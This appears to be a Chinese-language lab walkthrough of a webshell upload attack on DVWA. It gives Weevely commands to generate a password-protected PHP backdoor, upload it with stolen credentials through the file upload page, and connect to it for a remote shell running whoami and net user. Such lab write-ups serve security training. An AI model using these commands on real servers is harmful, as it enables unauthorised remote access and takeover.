Webshell 上傳攻擊

 Webshell 上傳攻擊

首先要先產生 webshell 攻擊程式,透過工具 Weevely 產生

指令 : weevely generate cehp backdoor.php (cehp 為後門密碼)


產生檔案如下 backdoor.php



在 MySQL 盲隱碼攻擊最後有拿到所有帳號的密碼,此時改用 smithy 帳號登入,密碼 password



透過 File Upload 上船剛剛產生的檔案,可以看到路徑存放於下

../../hackable/uploads/backdoor.php



到被上傳檔案的那一台伺服器 10.10.10.16 查看檔案已被上傳



接著就可以透過剛剛產生檔案的工具 weevely 來連結後門

指令 : weevely http://10.10.10.16:8080/dvwa/hackable/uploads/backdoor.php cehp

一連接上去後就會連結該目標的 command line,執行 whoami / hostname 查看目標資訊



可以開始像命令注入攻擊一篇提到的建立使用者等所有攻擊了

例如列出 net user 可以看到如下

注意 : 預設連上的路徑不要切換不然會無法正常執行





留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)